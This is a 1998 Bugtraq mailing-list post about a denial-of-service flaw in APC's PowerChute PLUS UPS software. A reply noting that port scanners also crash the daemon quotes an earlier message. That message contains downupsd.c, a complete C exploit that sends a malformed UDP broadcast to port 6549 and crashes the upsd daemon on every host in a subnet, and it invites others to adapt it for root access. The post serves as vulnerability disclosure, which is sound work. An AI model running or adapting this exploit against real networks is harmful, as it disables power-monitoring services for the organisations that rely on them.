[6505] in bugtraq
Re: APC UPS PowerChute PLUS exploit...
daemon@ATHENA.MIT.EDU (Richard Peters)
Mon Apr 13 14:32:11 1998
Date: Mon, 13 Apr 1998 00:15:28 -0700
Reply-To: Richard Peters <rap@UCLINK.BERKELEY.EDU>
From: Richard Peters <rap@UCLINK.BERKELEY.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.GSO.3.96.980410230211.26535A-100000@peregrine.cs.jhu.edu>
You don't need a specific exploit program to crash PowerChute software. Some port-scanners will crash it. We contacted PowerChute several months ago. Here's what the person who contacted them reported.
I talked with the unix group at APC (the vendor for the UPS)
about the problem of the ups daemon (_upsd) dying when another
process such as a port scanner accessing the port thru which
it runs. I filed trouble report #792505. They said this
result is expected of the ups daemon not only on unix systems
but also other operating systems such as NT. No work-around is
being resolved by them unless enough customers complained.
The only solution for us is to develop a script to monitor ...
..Richard Peters
At 11:13 PM -0400 4/10/98, Theo Schlossnagle wrote:
>I run Solaris x86 (2.5, 2.5.1, 2.6). I have a APC Smart UPS 700 (Model
>shouldn't matter for the exploit). Exploit in PowerChute PLUS v4.2.2
>
>The PowerChute PLUS software distributed with the UPSs provides a TCP/IP
>(UDP/IP) way to communicate with (for monitoring) UPS on the local subnet.
>It listens on port 6549 and listens for broadcast requests (UDP).
>So if you make as if you are actually requesting information, but send it
>the wrong packet... Well end of ./_upsd (the name of the daemon).
>I assume an exploit could be tailored to leverage root privileges.
>The REALLY BAD news is that ALL upsd's on the subnet are effected (UDP
>broadcast)
>
>I would wager that this is not only a problem on Solaris x86. If anyone
>finds this to work on other platforms I would love to know, also if
>someone tailors it to gain root or other interesting things, I would love
>to here about it.
>
>I spoke with APC (www.apcc.com) and they blew me off. Forwarded the issue
>to their techinical crew, but I never heard word again.
>
>Here goes:
>
>----- begin downupsd.c -----
>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/types.h>
>#include <sys/socket.h>
>#include <netdb.h>
>#include <netinet/in.h>
>
>int main(int argc, char **argv) {
>int s;
>long on=1;
>size_t addrsize;
>char buffer[256];
>struct sockaddr_in toaddr, fromaddr;
>struct hostent h_ent;
>
>if(argc!=2) {
> fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]);
> exit(0);
>}
>s = socket(AF_INET,SOCK_DGRAM,0);
>setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
>
>printf("Crashing upsd on host's subnet: %s\n", argv[1]);
>
>toaddr.sin_family = AF_INET;
>toaddr.sin_port = htons(0);
>toaddr.sin_addr.s_addr = 0x00000000;
>bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
>toaddr.sin_port = htons(6549);
>memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
>memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
>toaddr.sin_addr.s_addr |= 0xff000000;
>strcpy(buffer, "027|1|public|9|0|0|2010~|0\0");
>sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
> sizeof(struct sockaddr_in));
>
>printf("Crashed...\n");
>close(s);
>
>}
>------- end downupsd.c -----
>
>
>Theo Schlossnagle
>jesus@cs.jhu.edu
>That jesus guy
